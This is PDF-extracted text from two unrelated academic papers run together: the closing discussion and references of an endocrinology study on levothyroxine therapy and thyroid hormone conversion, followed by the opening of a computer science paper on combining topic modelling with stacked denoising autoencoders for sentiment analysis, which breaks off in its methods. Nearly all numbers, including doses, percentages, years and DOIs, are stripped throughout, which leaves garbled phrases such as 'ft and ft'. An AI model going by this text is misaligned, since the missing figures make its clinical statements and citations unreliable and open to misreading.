in contrast, another recent experimental study has shown that escalating only the l-t dose fails to normalize serum t in the rat, and as a result, irrespective of local variations by type of deiodinase, all organs examined such as the brain, liver and skeletal muscle were hypothyroid at the tissue level in the presence of a normal serum tsh ( ). this study suggests http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd ubiquitination may be the limiting factor for t alone to restore true tissue euthyroidism in the rodent ( ). the lack of tsh stimulation and absence or functional deficiency of the thyroid gland may also impair t –t conversion ( ). another important consideration is that, just as ft and ft dissociate under l-t therapy, so do tsh and ft . while a high proportion of patients was able to achieve a target of a suppressed tsh below the lower reference limits or a tsh value ! mu/l in autoimmune thyroiditis, their ft levels at the same time frequently remained below the median ft level found in normal subjects. the situation differs from conditions in which l-t absorption may be impaired and, as a consequence, elevated tsh levels persist ( , , ). thus, not even an l-t dose in which tsh is fully suppressed and ft by far exceeds its upper reference limit can guarantee above average ft levels in these patients, indicating an ft –tsh disjoint. as a consequence, although dose escalation may help some patients who maintained a sufficiently efficient thyroid hormone conversion to raise their ft for euthyroidism and well-being, the strategy may not be invariably successful in all patients. in two studies, w % of athyreotic patients could not even raise their ft above the lower reference limit on l-t ( , ). another controlled follow-up study after hemithyroidectomy for benign euthyroid goitre suggests that this deficiency may have unwanted clinical consequences. in this study, weight gain after years in association with a lowered thyroid function within the laboratory reference range was interpreted as a clinical manifestation of a perma- nently decreased metabolic rate ( ). l-t dose requirements have been well studied and various regimes based on weight, bmi or more refined algorithms have been proposed to put patients on a presumed adequate dose from the very beginning ( , , , , , , , , , , , ). as useful as these algorithms may be for average predictions and initial guidance in the general population, they do not take into account individual variations in the response to l-t , such as conversion efficiency. dosing strategies solely based on a tsh definition of euthyroidism neglect the important role of ft , which has recently emerged as an equally significant parameter in defining thyroid physiology ( , , , , , ). central and peripheral regulatory mechanisms do not constitute divided levels of control, as has previously been assumed. rather they are integrated via feed-forward control of deiodinase activity by tsh and operate jointly to maintain t homeostasis as an over- arching goal ( ). this work is licensed under a creative commons attribution-noncommercial . international license. http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : while acknowledging the role of genetically determined differences in deiodinase activity affecting conversion rates, the poor converter status described here appears to emerge mainly as a consequence of the t monotherapy itself, induced by the mechanisms discussed above ( , , , ). compared to untreated subjects, deiodinase activity and conversion efficiency tend to be diminished in l-t treatment ( , ). however, individ- ual pre-treatment measurements were not available for comparison. we found conversion inefficiency to be significantly correlated with low residual thyroid volume and most prevalent in athyreotic patients. however, differences in deiodinase activities were also apparent in the absence of a functioning thyroid gland within the group of thyroidectomised carcinoma patients. overall, patients differ widely in the degree of the conversion impairment they suffer. this, in turn, may influence their dose requirements of l-t and, at a comparable weight- adjusted l-t dose, their levels of tsh suppression and circulating ft concentrations. we speculate that l-t -induced conversion ineffi- ciency could prevent some vulnerable subjects from reaching true tissue normality on t monotherapy alone. those were not analysed separately in the numerous earlier t /t trials and could be possible candidates for a combined t /t treatment option, as recognized by some authors and the guidelines of the european thyroid association ( , ). as a limitation, this study addresses biochemical treatment responses but did not evaluate patient-reported outcomes or biomarkers of thyroid hormone action. whether conversion efficiency and the resulting differences in relationships between tsh, ft and ft are clinically useful markers of dosing inadequacy requires further well-designed prospective studies. patient satis- faction, complaints and symptoms play an essential part in the clinical assessment. however, owing to considerable inter-individual variation, these measures apparently lack statistical power in a trial setting and have not been clearly linked to prognosis. for example, even a change in thyroid function as profound as the transition from the hypo- thyroid to the euthyroid state may be associated with only modest improvements in thyroid-related quality-of-life measures in patients with autoimmune thyroiditis ( ). as a result, a trial size of several thousand subjects may be required to produce a credible result with adequate discriminatory power. additionally, the exact outcome would depend on the overall makeup of the panel as regards the mixture of t –t conversion capabilities. possible long-term consequences of the observed http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd biochemical alterations such as the altered ft –ft ratio are also presently unknown. the findings of the present study have several clinical implications. first, they recognize thyroid hormone conversion efficiency, as defined by the calculated global deiodinase activity or more simply the t –t ratio, is an important determinant of l-t dose requirements and the biochemical response to treatment. second, in view of a t -related ft –tsh disjoint, ft measurement should be adopted as an additional treatment target. third, in cases where an ft –ft dissociation becomes increasingly apparent following dose escalation of l-t , an alternate treatment modality, possibly t /t combination therapy, should be considered, but further randomized controlled trials are required to assess the benefit versus risk in this particular group. declaration of interest j w dietrich is co-owner of the intellectual property rights for the patent ‘system and method for deriving parameters for homeostatic feedback control of an individual’ (singapore institute for clinical sciences, biomedical sciences institutes, application number e ). all other authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this research did not receive any specific grant from any funding agency in the public, commercial or not-for-profit sector. acknowledgements the authors are grateful to hans-günther wahl, institute of laboratory medicine, klinikum lüdenscheid, for measuring thyroid hormones. references bjoro t, holmen j, kruger o, midthjell k, hunstad k, schreiner t, sandnes l & brochmann h. prevalence of thyroid disease, thyroid dysfunction and thyroid peroxidase antibodies in a large, unselected population. the health study of nord-trondelag (hunt). european journal of endocrinology – . (doi: . /eje. . ) vanderpump mp, tunbridge wm, french jm, appleton d, bates d, clark f, grimley evans j, hasan dm, rodgers h & tunbridge f. the incidence of thyroid disorders in the community: a twenty-year follow- up of the whickham survey. clinical endocrinology – . (doi: . /j. - . .tb .x) roberts cgp & ladenson pw. hypothyroidism. lancet – . (doi: . /s - ( ) - ) mandel sj, brent ga & larsen pr. levothyroxine therapy in patients with thyroid disease. annals of internal medicine – . (doi: . / - - - - - ) biondi b & wartofsky l. treatment with thyroid hormone. endocrine reviews – . (doi: . /er. - ) this work is licensed under a creative commons attribution-noncommercial . international license. http://dx.doi.org/ . /eje. . http://dx.doi.org/ . /eje. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . /er. - http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : bianco ac, salvatore d, gereben b, berry mj & larsen pr. biochemistry, cellular and molecular biology, and physiological roles of the iodothyronine selenodeiodinases. endocrine reviews – . (doi: . /edrv. . . ) pilo a, iervasi g, vitek f, ferdeghini m, cazzuola f & bianchi r. thyroidal and peripheral production of , , -triiodothyronine in humans by multicompartmental analysis. american journal of physiology. endocrinology and metabolism e –e . jonklaas j, bianco ac, bauer aj, burman kd, cappola ar, celi fs, cooper ds, kim bw, peeters rp, rosenthal ms et al. guidelines for the treatment of hypothyroidism: prepared by the american thyroid association task force on thyroid hormone replacement. thyroid – . (doi: . /thy. . ) baloch zw, carayon p, conte-devolx b, demers lm, feldt- rasmussen u, henry j-f, livosli va, niccoli-sire p, john r, uf j et al. laboratory medicine practice guidelines. laboratory support for the diagnosis and monitoring of thyroid disease. thyroid – . (doi: . / ) roos a, linn-rasker sp, van domburg rt, tijssen jp & berghout a. the starting dose of levothyroxine in primary hypothyroidism treatment: a prospective, randomized, double-blind trial. archives of internal medicine – . (doi: . /archinte. . . ) santini f, pinchera a, marsili a, ceccarini g, castagna mg, valeriano r, giannetti m, taddei d, centoni r, scartabelli g et al. lean body mass is a major determinant of levothyroxine dosage in the treatment of thyroid diseases. journal of clinical endocrinology and metabolism – . (doi: . /jc. - ) sukumar r, agarwal a, gupta s, mishra a, agarwal g, verma ak & mishra sk. prediction of lt replacement dose to achieve euthyroidism in subjects undergoing total thyroidectomy for benign thyroid disorders. world journal of surgery – . (doi: . / s - - - ) mistry d, atkin s, atkinson h, gunasekaran s, sylvester d, rigby as & england rj. predicting thyroxine requirements following total thyroidectomy. clinical endocrinology – . (doi: . / j. - . . .x) jin j, allemang mt & mchenry cr. levothyroxine replacement dosage determination after thyroidectomy. american journal of surgery – discussion – . (doi: . /j.amjsurg. . . ) ojomo ka, schneider df, reiher ae, lai n, schaefer s, chen h & sippel rs. using body mass index to predict optimal thyroid dosing after thyroidectomy. journal of the american college of surgeons – . (doi: . /j.jamcollsurg. . . ) di donna v, santoro mg, de waure c, ricciato mp, paragliola rm, pontecorvi a & corsello sm. a new strategy to estimate levothyroxine requirement after total thyroidectomy for benign thyroid disease. thyroid – . (doi: . /thy. . ) wiersinga wm. paradigm shifts in thyroid hormone replacement therapies for hypothyroidism. nature reviews. endocrinology – . (doi: . /nrendo. . ) pepper gm & casanova-romero py. conversion to armour thyroid from levothyroxine improved patient satisfaction in the treatment of hypothyroidism. journal of endocrinology, diabetes & obesity – . gullo d, latina a, frasca f, le moli r, pellegriti g & vigneri r. levothyroxine monotherapy cannot guarantee euthyroidism in all athyreotic patients. plos one e . (doi: . /journal. pone. ) hoermann r, midgley jem, larisch r & dietrich jw. is pituitary tsh an adequate measure of thyroid hormone-controlled homoeostasis during thyroxine treatment? european journal of endocrinology – . (doi: . /eje- - ) midgley jem, hoermann r, larisch r & dietrich jw. physiological states and functional relation between thyrotropin and free thyroxine in thyroid health and disease: in vivo and in silico data suggest a http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd hierarchical model. journal of clinical pathology – . (doi: . /jclinpath- - ) hoermann r, midgley jem, giacobino a, eckl wa, wahl hg, dietrich jw & larisch r. homeostatic equilibria between free thyroid hormones and pituitary thyrotropin are modulated by various influences including age, body mass index and treatment. clinical endocrinology – . (doi: . / cen. ) larisch r, giacobino a, eckl w, wahl hg, midgley jem & hoermann r. reference range for thyrotropin. post hoc assessment. nuklearmedizin – . (doi: . /nukmed- - - ) dietrich jw, landgrafe g & fotiadou eh. tsh and thyrotropic agonists: key actors in thyroid homeostasis. journal of thyroid research – . (doi: . / / ) fellows i. deducer: a data analysis gui for r. journal of statistical software – . r core team. r: a language and environment for statistical computing. r foundation for statistical computing . vienna, austria: r foundation for statistical computing. (available at: http://www.r-project.org/) silva ej, gordon mb, crantz fr, leonard jl & larsen pr. qualitative and quantitative differences in the pathways of extrathyroidal triiodothyronine generation between euthyroid and hypothyroid rats. journal of clinical investigation – . (doi: . / jci ) cettour-rose p, visser tj, burger ag & rohner-jeanrenaud f. inhibition of pituitary type deiodinase by reverse triiodothyronine does not alter thyroxine-induced inhibition of thyrotropin secretion in hypothyroid rats. european journal of endocrinology – . (doi: . / eje. . ) werneck de castro jp, fonseca tl, ueta cb, mcaninch ea, abdalla sm, wittmann g, lechan rm, gereben b & bianco ac. differences in hypothalamic type deiodinase ubiquitination explain localized sensitivity to thyroxine. journal of clinical investigation – . (doi: . /jci ) hoermann r, midgley jem, larisch r & dietrich j. integration of peripheral and glandular regulation of triiodothyronine production by thyrotropin in untreated and thyroxine-treated subjects. hormone and metabolic research – . (doi: . /s- - ) checchi s, montanaro a, pasqui l, ciuoli c, de palo v, chiappetta mc & pacini f. l-thyroxine requirement in patients with autoimmune hypothyroidism and parietal cell antibodies. journal of clinical endocrinology and metabolism – . (doi: . / jc. - ) liwanpo l & hershman jm. conditions and drugs interfering with thyroxine absorption. best practice & research. clinical endocrinology & metabolism – . (doi: . /j.beem. . . ) robertson hma, narayanaswamy akp, pereira o, copland sa, herriot r, mckinlay aw, bevan js & abraham p. factors contributing to high levothyroxine doses in primary hypothyroidism: an interventional audit of a large community database. thyroid – . (doi: . /thy. . ) toft kristensen t, larsen j, pedersen pl, feldthusen a-d, ellervik c, jelstrup s & kvetny j. weight gain and serum tsh increase within the reference range after hemithyroidectomy indicate lowered thyroid function. journal of thyroid research . (doi: . / / ) fish lh, schwartz hl, cavanaugh j, steffes mw, bantle jp & oppenheimer jh. replacement dose, metabolism, and bioavailability of levothyroxine in the treatment of hypothyroidism. new england journal of medicine – . (doi: . / nejm ) banovac k, carrington sa, levis s, fill md & bilsker ms. determination of replacement and suppressive doses of thyroxine. journal of international medical research – . this work is licensed under a creative commons attribution-noncommercial . international license. http://dx.doi.org/ . /edrv. . . http://dx.doi.org/ . /thy. . http://dx.doi.org/ . / http://dx.doi.org/ . /archinte. . . http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j.amjsurg. . . http://dx.doi.org/ . /j.jamcollsurg. . . http://dx.doi.org/ . /thy. . http://dx.doi.org/ . /nrendo. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /eje- - http://dx.doi.org/ . /jclinpath- - http://dx.doi.org/ . /cen. http://dx.doi.org/ . /cen. http://dx.doi.org/ . /nukmed- - - http://dx.doi.org/ . / / http://www.r-project.org/ http://dx.doi.org/ . /jci http://dx.doi.org/ . /jci http://dx.doi.org/ . /eje. . http://dx.doi.org/ . /eje. . http://dx.doi.org/ . /jci http://dx.doi.org/ . /s- - http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /j.beem. . . http://dx.doi.org/ . /j.beem. . . http://dx.doi.org/ . /thy. . http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . /nejm http://dx.doi.org/ . /nejm http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / e n d o cr in e c o n n e ct io n s research j e m midgley et al. response to l-t therapy – : gordon mb & gordon ms. variations in adequate levothyroxine replacement therapy in patients with different causes of hypothyroid- ism. endocrine practice – . (doi: . /ep. . . ) baehr km, lyden e, treude k, erickson j & goldner w. levothyroxine dose following thyroidectomy is affected by more than just body weight. laryngoscope – . (doi: . /lary. ) de lima jg, de mesquita djtm, da costa fernandes f, de souza abc, santos juniordos ac, reboucas b, de lima nn, sousa agp & nobrega lhc. comparison among the daily levothyroxine doses according to the etiology of hypothyroidism. journal of endocrinology and metabolism – . (doi: . /jem w) abdalla sm & bianco ac. defending plasma t is a biological priority. clinical endocrinology – . (doi: . /cen. ) fonseca tl, correa-medina m, campos mpo, wittmann g, werneck-de-castro jp, arrojo e drigo r, mora-garzon m, ueta cb, caicedo a, fekete c et al. coordination of hypothalamic and pituitary t production regulates tsh expression. journal of clinical investigation – . (doi: . /jci ) hoftijzer hc, heemstra ka, visser tj, le cessie s, peeters rp, corssmit epm & smit jwa. the type deiodinase orfa-gly asp polymorphism (rs ) influences the set point of the hypo- thalamus–pituitary–thyroid axis in patients treated for differentiated thyroid carcinoma. journal of clinical endocrinology and metabolism e –e . (doi: . /jc. - ) panicker v, saravanan p, vaidya b, evans j, hattersley at, frayling tm & dayan cm. common variation in the dio gene predicts baseline psychological well-being and response to combination thyroxine plus http://www.endocrineconnections.org doi: . /ec- � the authors published by bioscientifica ltd triiodothyronine therapy in hypothyroid patients. journal of clinical endocrinology and metabolism – . (doi: . / jc. - ) taylor pn, panicker v, sayers a, shields b, iqbal a, bremner ap, beilby jp, leedman pj, hattersley at, vaidya b et al. a meta-analysis of the associations between common variation in the pde b gene and thyroid hormone parameters, including assessment of longitudinal stability of associations over time and effect of thyroid hormone replacement. european journal of endocrinology – . (doi: . /eje- - ) mcaninch ea, jo s, preite nz, farkas e, mohácsik p, fekete c, egri p, gereben b, li y, eng y et al. prevalent polymorphism in thyroid hormone-activating enzyme leaves a genetic fingerprint that underlies associated clinical syndromes. journal of clinical endocrinology and metabolism – . (doi: . /jc. - ) wiersinga wm. do we need still more trials on t and t combination therapy in hypothyroidism? european journal of endocrinology – . (doi: . /eje- - ) wiersinga wm, duntas l, fadeyev v, nygaard b & vanderpump mpj. eta guidelines: the use of l-t cl-t in the treatment of hypothyroid- ism. european thyroid journal – . (doi: . / ) watt t, cramon p, hegedüs l, bjorner jb, bonnema sj, rasmussen åk, feldt-rasmussen u & groenvold m. the thyroid-related quality of life measure thypro has good responsiveness and ability to detect relevant treatment effects. journal of clinical endocrinology and metabolism – . (doi: . /jc. - ) received in final form august accepted august this work is licensed under a creative commons attribution-noncommercial . international license. http://dx.doi.org/ . /ep. . . http://dx.doi.org/ . /lary. http://dx.doi.org/ . /jem w http://dx.doi.org/ . /cen. http://dx.doi.org/ . /jci http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /eje- - http://dx.doi.org/ . /jc. - http://dx.doi.org/ . /eje- - http://dx.doi.org/ . / http://dx.doi.org/ . /jc. - http://www.endocrineconnections.org http://dx.doi.org/ . /ec- http://creativecommons.org/licenses/by-nc/ . / http://creativecommons.org/licenses/by-nc/ . / introduction subjects and methods outline placeholder study design and objective patients laboratory methods ft -ft ratio and calculated deiodinase activity thyroid ultrasound and scintigraphy statistical methods results discussion declaration of interest funding acknowledgements references beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling noura al moubayed , stephen mcgough and bashar awwad shiekh hasan department of computer science, durham university, durham, uk department of computer science, university of newcastle upon tyne, newcastle, uk caspian learning, newcastle upon tyne, newcastle, uk abstract the article presents a discriminative approach to complement the unsupervised probabilistic nature of topic modelling. the framework transforms the probabilities of the topics per document into class-dependent deep learning models that extract highly discriminatory features suitable for classification. the framework is then used for sentiment analysis with minimum feature engineering. the approach transforms the sentiment analysis problem from the word/document domain to the topics domain making it more robust to noise and incorporating complex contextual information that are not represented otherwise. a stacked denoising autoencoder (sda) is then used to model the complex relationship among the topics per sentiment with minimum assumptions. to achieve this, a distinct topic model and sda per sentiment polarity is built with an additional decision layer for classification. the framework is tested on a comprehensive collection of benchmark datasets that vary in sample size, class bias and classification task. a significant improvement to the state of the art is achieved without the need for a sentiment lexica or over-engineered features. a further analysis is carried out to explain the observed improvement in accuracy. subjects artificial intelligence, data mining and machine learning, data science, natural language and speech keywords topic modelling, stacked denoising autoencoders, text classification, sentiment analysis introduction the rise of social media and online reviews has resulted in an exponential increase in the available data. facebook has over a billion and a half active users a month (smith, ) with billions of comments, and social reactions (in form of like, love, etc.). twitter, the largest micro-blogging website, has millions of users (clement, ) writing million tweets on a daily basis. customer reviews are a standard feature of almost every online purchasing service (e.g. amazon or expedia). this vast wealth of data is raising the need for sophisticated analysis methods to better understand and exploit the knowledge hidden in the data. a successful approach is probabilistic topic modelling, which follows a hierarchal mixture model methodology to unravel the underlying patterns of words embedded in large collections of documents (blei, carin & dunson, ; hofmann, ; canini, shi & griffiths, ). the discovery of these patterns, known as topics, opens the doors for how to cite this article al moubayed n, mcgough s, awwad shiekh hasan b. . beyond the topics: how deep learning can improve the discriminability of probabilistic topic modelling. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted december published january corresponding author noura al moubayed, noura.al-moubayed@durham.ac.uk academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. © al moubayed et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:noura.�al-moubayed@�durham.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ deeper analysis of the data including: clustering, sorting, summarisation, and prediction (blei, carin & dunson, ). latent dirichlet allocation (lda) (blei, ng & jordan, ) is one of the most commonly used probabilistic topic modelling methods. it decomposes a collection of documents into its salient topics. a topic in lda is a probability distribution over the documents’ vocabulary. lda assumes a fixed number of topics set apriori and that each document may contain a combination of topics. lda, and its variants (teh et al., ; porteous et al., ), is a completely unsupervised method with very few prior assumptions which has led to its popularity in text summarisation and clustering of large unstructured datasets. however, when labelled data is available it would be beneficial to include the class label in the model itself as demonstrated in (mcauliffe & blei, ; perotte et al., ; huh & fienberg, ; zhu, ahmed & xing, ). latent dirichlet allocation was customised to accommodate specific application area like sentiment analysis. sentiment analysis tries to understand the sentiment behind the written text, for example product reviews. this problem has drawn a lot of attention in the last few years given the social and commercial impact it has (bradley & lang, ; bravo-marquez, mendoza & poblete, ; go, bhayani & huang, ; liu, ). in a highly competitive online market the deeper the understanding of customer views and attitudes the further advantage a business can have against the competition. jo & oh ( ) extended lda to include sentence modelling with aspect/sentiment. mei et al. ( ) and lin & he ( ) explicitly model the sentiments in the data and then train the model in an unsupervised approach similar to the standard lda. topic modelling for sentiment analysis reduces the need for hand-crafted features and especially annotated corpora (bradley & lang, ; cambria, havasi & hussain, ; esuli & sebastiani, ; nielsen, ). in this work, we take a novel approach to expand the modelling power of lda within a supervised framework. the framework builds a separate lda model per class. each lda is then used as a feature extractor to train a stacked denoising autoencoder (sda). the trained sdas are used to generate the input to a simple classifier. the added layer of sdas help further increase the disrciminability among the classes and hence achieve higher classification accuracy. the introduced framework addresses the following points: (i) it avoids language specific sentiment lexicon and directly engineered features on the word/sentence level. instead, we focus on modelling higher level abstract concepts/topics. (ii) the system learns through hierarchical structure modelling to better understand the inter-dependencies among words and topics to convey the sentiment. (iii) the framework is very general and can easily be adapted to different tasks and data sets with minimum feature engineering. this approach is motivated by three key points: � context embedding: topic modelling through a probabilistic mixture approach (e.g. latent dirichilet allocation) is highly advantageous in modelling the context in which words may appear given a sentiment. this also transfers the classification problem from the words space (or an engineered feature space of words) to the topic space making the whole system much more robust to noise. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � structural modelling of topics: the use of sda through a hierarchal structure of deep neural network captures, with minimum assumptions, the structural inter-dependencies among topics within the context of a sentiment (e.g. polarity, subjectivity, etc.). � simplified classification: as we will show in the methods and experiments, the combined use of topic modelling and sda with our novel utilisation of reconstruction error (re) results in highly separable feature space requiring only a simple linear classifier. the main contributions of this work are: � develop a framework for automatic text classification with minimum feature engineering. � expand topic modelling by introducing an additional layer of abstraction to model the inter-relations amongst topics of the same text category. � introduce the re of an auto-encoder as a surrogate measure of sample representation by the auto-encoder. the res of the built sdas are used as features for classification. � discriminability analysis to explain the benefit of sdas and re in enhancing the performance of the text classification task. the framework is tested on ten benchmark datasets that vary in classification task, size, and domain with results significantly outperforming the state of the art on / of the datasets. the next section reviews the related work in sentiment analysis. “methods” details the methods used, followed by a description of the datasets used and the experimental design in “data sets and experiments”. the results are reported in “results”, while “discussion” further examines the approach and the achieved results, and “conclusion” summarizes the article. related work text classification problems are usually viewed as two tier problems: feature extraction and classification. reviewing the state of the art in text classification is beyond the scope of this paper, however as we take sentiment analysis as an application we will briefly review the literature in this application. feature extraction/engineering early work on sentiment analysis approached the problem from the traditional topic-based categorisation point of view. this involved standard natural language processing (nlp) techniques such as bag of words (pang, lee & vaithyanathan, ), word vectors (maas et al., ; pouransari & ghili, ), n-grams (nguyen et al., ), and rule-based classifiers (riloff, wiebe & phillips, ). despite their initial success these methods performed worse than expected in comparison with other topic categorisation problems, as the approaches taken were not designed specifically for sentiment classification. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to incorporate prior information into the feature extraction method a lexical resource for sentiment analysis is needed to assign a polarity (e.g. positive, negative, or neutral) to the words independent of the context. wilson, wiebe & hoffmann ( ) built the opinion finder lexicon on individual words and then used it to define sentiment at the level of phrases. a similar approach was taken by zirn et al. ( ) which uses a sophisticated markov chain method to predict the contextual sentiment of words within phrases or short text. another commonly used lexicon for english language was presented by bradley & lang ( ) and later used for twitter sentiment analysis by nielsen ( ). other well-known lexicons include sentistrength (thelwall, buckley & paltoglou, ) and nrc (mohammad & turney, ). for more discussion and comparisons among the lexical resources the interested reader is referred to the work by bravo-marquez, mendoza & poblete ( ), where the authors also combined features from several lexical resources to enhance the performance of the overall system. an appraisal group of sentiments was developed by whitelaw, garg & argamon ( ) and then used to produce bag of words features. based on the psychological definition of emotional states, mohammad & turney ( ) labelled a word bank for sentiment analysis. to establish more context aware features kennedy & inkpen ( ) used contextual valence shifters to rank words within a text which can then be fed to a classifier. nguyen et al. ( ) used ratings (labelled or predicted) to enhance the performance of a word vector based sentiment analysis system. a sophisticated feature engineering approach was used for twitter data by agarwal et al. ( ). it starts by using a polarity dictionary to assign a prior polarity to each word and then a tree representation of tweets is designed to combine many categories of features in one structure. a convolution kernel is then employed to compare among several trees. tang et al. ( b) used neural networks to learn sentiment specific word embedding (sswe) to transform words into a continuous representation that takes into account the sentiment and syntactic context of words. in the context of information retrieval, eguchi & lavrenko ( ) used a generative probabilistic model for topic modelling in order to retrieve documents with certain sentiment/polarity. the model extends the definition of topics within the text to model sentiments. the user would then request documents by topic and sentiment. a topic sentiment mixture model was proposed by mei et al. ( ) which builds sentiment models for positive and negative opinions and extract topic models with their relevant sentiment coverage. similarly a joint sentiment/topic model (jst) was presented by lin & he ( ) that extends the well known unsupervised model, lda. jst was further extended by jo & oh ( ) to handle words from several languages. the advantage of topic modelling in general is that: (i) it allows for the extraction of useful information without the need for significant feature engineering. (ii) the dimensionality of the resulting feature space can be set a-priori and is usually much smaller than the sparse feature vectors resulted from bag of words or n-grams. (iii) lda, and other bayesian topic models, is adaptive by definition providing the overall system with the ability to handle streams of data very efficiently. (iv) transforming the input space to topics space makes the classifier less sensitive to noise. in “methods” we present lda in its original form before using it later to extract topic features (without modelling the al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sentiment). the sentiment modelling is carried out on a later stage using deep neural networks. classification following topic categorisation problems several machine learning classification methods (mostly supervised) are commonly employed. maximum entropy classifier, which measures the amount of information the features can ‘tell’ about the polarity/sentiment, was used repeatedly (pang, lee & vaithyanathan, ; saif et al., ). naive bayes classifier was also used by wu & pao ( ). however, support vector machines (svm) are arguably the most widely used approach for sentiment prediction (agarwal et al., ; bravo-marquez, mendoza & poblete, ; nguyen et al., ; wu & pao, ). more recently deep neural networks have been adopted for sentiment analysis after their impressive performance in several tasks under the umbrella of nlp (collobert et al., ). pouransari & ghili ( ) utilised a recursive neural network (rnn) to model not only the individual words but how they appear in relationship to each other within a phrase of a given sentiment. rnn is commonly used in nlp due to their ability to model such structures. however, to represent complex relationships (e.g. negated positive) socher et al. ( ) presented recursive neural tensor networks. a combined rnn model that takes into account the aspect extraction and sentiment representation was presented in lakkaraju, socher & manning ( ) using a hierarchical deep learning framework. a dynamic convolutional neural network was used by kalchbrenner, grefenstette & blunsom ( ) to handle input sentences of varying length capturing short and long-range relations, which could be particularly important for sentiment analysis. tang et al. ( a) used the same neural networks for sswe but with added convolutional layers for category prediction. wu & pao ( ) built a deep feed-forward neural network to extract and classify high level features obtained from n-grams with the aim of reducing the complexity of feature engineering. a brief review and comparison of performance in sentiment analysis among rnn, and convolutional networks is discussed by shirani-mehr ( ) where the authors find, based on testing on one dataset only, that convolutional neural networks with word vector features performed better than the other networks or the baseline naive bayesian classifier. most relevant to our work are semi-supervised recursive autoencoders (ae) which were introduced for sentiment analysis by socher et al. ( ). the authors used ae (described in “stacked denoising autoencoders”) without a predefined structure with a combined reconstruction and cross entropy errors as the optimisation objective of the structural learning approach. ae based algorithms were used by mirowski, ranzato & lecun ( ) to model a bag of words for text classification, topic modelling, and sentiment analysis tasks using a similar semi-supervised approach. pollack ( ) introduced recursive ae as a compact distributed representation method for data, including textual data. however, the approach relied on binary word representation requiring a large sparse input space. to enhance generalisation a linear modification was introduced by voegtlin & dominey ( ) but with the same binary features. word vector features were used by socher et al. ( ) which are argued to be more suitable for ae, which require continuous data by definition. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ methods our framework aims at finding a uniform way of representing variable-sized phrases and then using this representation effectively to achieve accurate sentiment classification. topic modelling is used as a feature extraction method which provides a robust representation that requires minimum feature engineering independent of the language used and without the need for task-specific lexicon. it also converts a variable length document to a vector of probabilities (i.e. continuous variables) which has an advantage when modelling with stacked ae. ae uses the input topic model representation of all the documents labelled as conveying a specific task (e.g. sentiment) to build a structural representation that defines that task. res, of the different aes are then used by a simple classifier (we explore several options in “classification approach”) to provide the final prediction of the task perceived from the input document. shifting the problem from word and phrases representation to topic representation has the advantage of building more dynamic and robust systems where small changes on the document level (or the introduction of new documents) will not cause a major change in how the topics are represented opening the door for adaptive text classification models that are able to cope with the fast changing content of the web. figure describes the process of sentiment analysis using the proposed framework in this article. the input data of several resources is separated to negative and positive polarity. two topic models are then built using the polarity specific data. the extracted features from each topic model are used to train the corresponding sda model. to predict the sentiment of a given text, it is passed through the two topic models and the two sdas resulting in an overall reconstruction error (ore) per sda which are used by a linear classifier to predict the polarity. topic modeling consider, conceptually, that a phrase expressing a given task/sentiment is formed from a collection of words which are commonly used to express that sentiment. by capturing those task-related words, in the form of a topic, we should be able to capture the sentiment of a phrase (or document) more accurately than conventional keyword analysis. through the building of a text/language model that transforms the words into an abstract (vector) representation should result in more informative features that are less affected by ‘noise’ at the word or even document level. this area of research is referred to as topic modelling (blei, ). within the context of a given text classification task, topic models are able to automatically include contextual information, which is particularly helpful in cases where a word might reflect different sentiments in different domains/topics (e.g. ‘easy’ would be a positive sentiment in the context of the use of household items, but an ‘easy’ online game would be perceived negatively). topic models are built as a bayesian network (blei, ) where the observed variables (the words) can be generated by realisation of random variables within the network. the network is equivalent to a mixture of models, that is a document is associated with the probability of it containing a topic al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and a document could include more than one topic. a word can be in more than one topic and a topic consists of more than one word. the probability of each document containing each of the topics can be used for further analysis. latent dirichlet allocation (blei, ng & jordan, ) is the most commonly used method for topic modelling (al moubayed, wall & mcgough, ). lda works by measuring the co-occurrence statistics of words/terms in a set of documents leading to recognising the topic structure within those documents. the only assumption made by lda is the number of underlying topics, k, 